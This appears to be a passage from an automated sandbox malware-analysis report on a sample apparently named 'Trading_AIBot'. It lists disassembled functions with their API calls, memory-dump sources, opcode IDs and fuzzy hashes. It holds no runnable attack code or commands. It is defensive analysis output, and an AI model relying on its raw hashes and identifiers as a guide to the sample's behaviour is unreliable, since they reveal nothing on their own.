                                                                                                                                      • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                      • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                      • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Control-flow Graph (graph not reproduced)
APIs
• _malloc.LIBCMT ref: 004057DE
  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
• _malloc.LIBCMT ref: 00405842
• _malloc.LIBCMT ref: 00405906
• _malloc.LIBCMT ref: 00405930
Strings
Memory Dump Source
• Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: _malloc$AllocateHeap
• String ID: 1.2.3
• API String ID: 680241177-2310465506
• Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
• Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
• Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
• Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Control-flow Graph (graph not reproduced)
APIs
Memory Dump Source
• Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
• String ID:
• API String ID: 3886058894-0
• Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
• Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
• Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
• Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Control-flow Graph (graph not reproduced)
APIs
• EntryPoint.RPKHZPUO(80070057), ref: 004017EE
  • Part of subcall function 00401030: RaiseException.KERNEL32(?,00000001,00000000,00000000,00000015,-30B19E70,2C2D8410), ref: 0040101C
  • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
• EntryPoint.RPKHZPUO(80070057), ref: 00401800
• EntryPoint.RPKHZPUO(80070057), ref: 00401813
• __recalloc.LIBCMT ref: 00401828
• EntryPoint.RPKHZPUO(8007000E), ref: 00401839
• EntryPoint.RPKHZPUO(8007000E), ref: 00401853
• _calloc.LIBCMT ref: 00401861
Memory Dump Source
• Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
• String ID:
• API String ID: 1721462702-0
• Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
• Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
• Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
• Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
APIs
• __getptd.LIBCMT ref: 00414744
  • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
  • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
• __getptd.LIBCMT ref: 0041475B
• __amsg_exit.LIBCMT ref: 00414769
• __lock.LIBCMT ref: 00414779
Strings
Memory Dump Source
• Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: __amsg_exit__getptd$__getptd_noexit__lock
• String ID: @.B
• API String ID: 3521780317-470711618
• Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
• Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
• Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
• Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
APIs
• __lock_file.LIBCMT ref: 0040C6C8
• __fileno.LIBCMT ref: 0040C6D6
• __fileno.LIBCMT ref: 0040C6E2
• __fileno.LIBCMT ref: 0040C6EE
• __fileno.LIBCMT ref: 0040C6FE
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Memory Dump Source
• Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
• String ID:
• API String ID: 2805327698-0
• Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
• Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
• Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
• Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
APIs
• __getptd.LIBCMT ref: 00413FD8
  • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
  • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
• __amsg_exit.LIBCMT ref: 00413FF8
• __lock.LIBCMT ref: 00414008
• InterlockedDecrement.KERNEL32(?), ref: 00414025
• InterlockedIncrement.KERNEL32(00422910), ref: 00414050
Memory Dump Source
• Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
Yara matches
Similarity
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
• String ID:
• API String ID: 4271482742-0
• Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
• Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
• Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
• Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                                      • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                      • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                      • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                      • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                      APIs
                                                                                                                                      • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                      • __locking.LIBCMT ref: 0040C791
                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2395185920-0
                                                                                                                                      • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                      • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                      • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                      • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _fseek_malloc_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 208892515-0
                                                                                                                                      • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                      • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                      • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                      • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                      APIs
                                                                                                                                      • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                      • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                      • __locking.LIBCMT ref: 0040BB95
                                                                                                                                      • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3240763771-0
                                                                                                                                      • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                      • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                      • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                      • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                      APIs
                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                      • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                      • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                      • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                      • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000001.2446233147.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000001.2446233147.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_1_400000_rpkhzpuO.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                      • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                      • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                      • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                      • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: dc9421f933c42fd5c837d7fc24b3c58c9f270b4b5a219e37eb9db22c4441bd0f
                                                                                                                                      • Instruction ID: 0f4e3b0ea1621cee83806093548d8c9b784071653052c7a40cb1fa69af2c3518
                                                                                                                                      • Opcode Fuzzy Hash: dc9421f933c42fd5c837d7fc24b3c58c9f270b4b5a219e37eb9db22c4441bd0f
                                                                                                                                      • Instruction Fuzzy Hash: 42812270D01248CFDB14EFA4D990AEDBBB2FF8A300F2081A9D549AB265DB355D86CF40
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f695f95790b549fc26a59fe2e8f6441bee431435a6215ade9505cf7f75d6da99
                                                                                                                                      • Instruction ID: 58b99677c9c12783d26ce77be92223690f3cf5244b0ba5295acb6190e37e85d2
                                                                                                                                      • Opcode Fuzzy Hash: f695f95790b549fc26a59fe2e8f6441bee431435a6215ade9505cf7f75d6da99
                                                                                                                                      • Instruction Fuzzy Hash: 1641BCB4D04348DFDB10DFAAC994ADEFBF1AF49310F24802AE409AB250D7749986CF54
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a5759dd77b6df311e9640f7b6d8a2dc620e53382801d2fcbdf4958e4c194e6a7
                                                                                                                                      • Instruction ID: 29b699e79e1bb73b0a4c213931b7dbc8f7b0052478998707e575e89d564faf99
                                                                                                                                      • Opcode Fuzzy Hash: a5759dd77b6df311e9640f7b6d8a2dc620e53382801d2fcbdf4958e4c194e6a7
                                                                                                                                      • Instruction Fuzzy Hash: CA41BAB4D04348DFDB14DFAAC884ADEFBF5AF48310F24802AE419AB254D7749986DF54
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
• Opcode ID: 07dbd715ef860a15bdf98b33b2585aa075cc7919772752a85b3359caa4e29ad3
• Instruction ID: d86d923e1bdd06060999afe8c67fd8970ca6acf23edd6d76b419a984e27bf8db
• Opcode Fuzzy Hash: 07dbd715ef860a15bdf98b33b2585aa075cc7919772752a85b3359caa4e29ad3
• Instruction Fuzzy Hash: 9EB2D070E02218DFDB64EF64C994BADBBB2BB49300F5085E9E409AB665DB345EC1DF40
Memory Dump Source
• Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: daff405b5a106077a34f353da334376c08fbd023ac5663d41af63fd080bf21ea
• Instruction ID: aec0bdc6b9bf0fb6a22ecbb3e9c9a2ef98445bf833e29056e8ed382307067ab2
• Opcode Fuzzy Hash: daff405b5a106077a34f353da334376c08fbd023ac5663d41af63fd080bf21ea
• Instruction Fuzzy Hash: AEB2D070E02228DFDB64EF64C994BADB7B2BB49300F5085E9E409AB664DB345EC1DF40
Memory Dump Source
• Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 062cd31193b8b29df1933c9ac4689dd3ee3e05cc4f8598bc9b26ea59c4b85fb2
• Instruction ID: e152ea08ae59482e1b50a6865caa3994ead56324d028015125c47a879599fd79
• Opcode Fuzzy Hash: 062cd31193b8b29df1933c9ac4689dd3ee3e05cc4f8598bc9b26ea59c4b85fb2
• Instruction Fuzzy Hash: 5072CC74A01259DFDB64EF64DA94B9DBBB2FF4A301F1080AAD509AB361DB305E81CF50
Memory Dump Source
• Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eb65fe18aececa60194f903c624968cf4f1d53ccfd62b6c0e83fd6881b56c33f
• Instruction ID: c990aeb7975e2fe1580b16fe9cd75519e7ca8a9e40bf83d68b0cb4a0c7cc9ee6
• Opcode Fuzzy Hash: eb65fe18aececa60194f903c624968cf4f1d53ccfd62b6c0e83fd6881b56c33f
• Instruction Fuzzy Hash: 3662AB74E01259DFDB64EF64DA94B9DBBB2BF89301F1080AAD509AB360DB315E81CF50
Memory Dump Source
• Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0dbd74da03b56f4353fbfe626fa702747a1c4a5ca428a943c6c3a66d91a02a53
• Instruction ID: aab1aa192ea906de9a35b2bf2fdc961591fe97fb271d65cbdbd7c923354a7d31
• Opcode Fuzzy Hash: 0dbd74da03b56f4353fbfe626fa702747a1c4a5ca428a943c6c3a66d91a02a53
• Instruction Fuzzy Hash: 67E04F6184D3C05FC3238BB45C656B87F749F17121B2801CAD4D59B1B3D5250957E752
Memory Dump Source
• Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 573880d9ffe7248c14e0805cb51d0aef92aa2bac6f6b3d373bcea2144b958783
• Instruction ID: 2f2923bc11a5a9bb7fc5b49ed2e233a19549380a7c2129103db8b44f0cc2795b
• Opcode Fuzzy Hash: 573880d9ffe7248c14e0805cb51d0aef92aa2bac6f6b3d373bcea2144b958783
• Instruction Fuzzy Hash: 9EB1CB74E02228CFEB64DF28C994B9DBBB2BB49304F1085AAD40DA7351DB306E85CF51
Memory Dump Source
• Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d44595d7c8f0e91a0210fb972cc1e8ab56e818b6fd9ac92ed9a40ed59192c9d7
• Instruction ID: 0049bbde78e6e82e986b98f75fc1adcb222060b66aad12c10e13ae238e532d84
• Opcode Fuzzy Hash: d44595d7c8f0e91a0210fb972cc1e8ab56e818b6fd9ac92ed9a40ed59192c9d7
• Instruction Fuzzy Hash: 7251D678A00248CFCB44DFA9D994A9DBBF2FF49311F108169E819AB365DB31AC46CF14
Memory Dump Source
• Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e64c8220e98147e279fdac80199c63b387e484a5f1830239126ac5fbe63895f6
• Instruction ID: ee36d9e862749cbb88a5c23af744ea7266372dd866424142120b9e68a0767610
• Opcode Fuzzy Hash: e64c8220e98147e279fdac80199c63b387e484a5f1830239126ac5fbe63895f6
• Instruction Fuzzy Hash: 8E51E078D05248DFDB04DFA8D5946EDBBF1BF49304F10802AE429AB3A5DB345982EF50
Memory Dump Source
• Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0c7e59d6099115833bc6db54427c21e33b2586786fa90535a6193f339dca7dc4
• Instruction ID: 61d254fbd1d723deff08dbb9a1e74b2442894bac5a5f24e8d44c4bc5c6cb2202
• Opcode Fuzzy Hash: 0c7e59d6099115833bc6db54427c21e33b2586786fa90535a6193f339dca7dc4
• Instruction Fuzzy Hash: 814100B0D04389DFDB15DFA9C884ADEFBF2AF49310F24846AD408AB261C7756886DF50
Memory Dump Source
• Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b5df9320ed0e5658c4b696ee5bbaa5b1a9d25e93dd71797d91c423db64738e62
• Instruction ID: 0a96d57e19c6bbc6ec642b56e183d94cd88452e1030ebf7049fd000ad5a9a92a
• Opcode Fuzzy Hash: b5df9320ed0e5658c4b696ee5bbaa5b1a9d25e93dd71797d91c423db64738e62
• Instruction Fuzzy Hash: DF41E175E012089FCB04DFA9D894AEEBBF2BF89301F14806AE515A73A0DB345941CFA0
Memory Dump Source
• Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 566d2e7ddea810de44959763314b7f5b3c8ddc6e872fdf32aba5caeca95f5ef4
• Instruction ID: 27335877a25837420ce565893580873947faa44687bbb82df7fff87b1bfdd6fa
• Opcode Fuzzy Hash: 566d2e7ddea810de44959763314b7f5b3c8ddc6e872fdf32aba5caeca95f5ef4
• Instruction Fuzzy Hash: 4041ACB0D04348DFDB14DFAAD984ADEBBF5AF48310F24842AE419AB250DB759885DF50
Memory Dump Source
• Source File: 0000000C.00000002.2946362734.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_f10000_Trading_AIBot.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
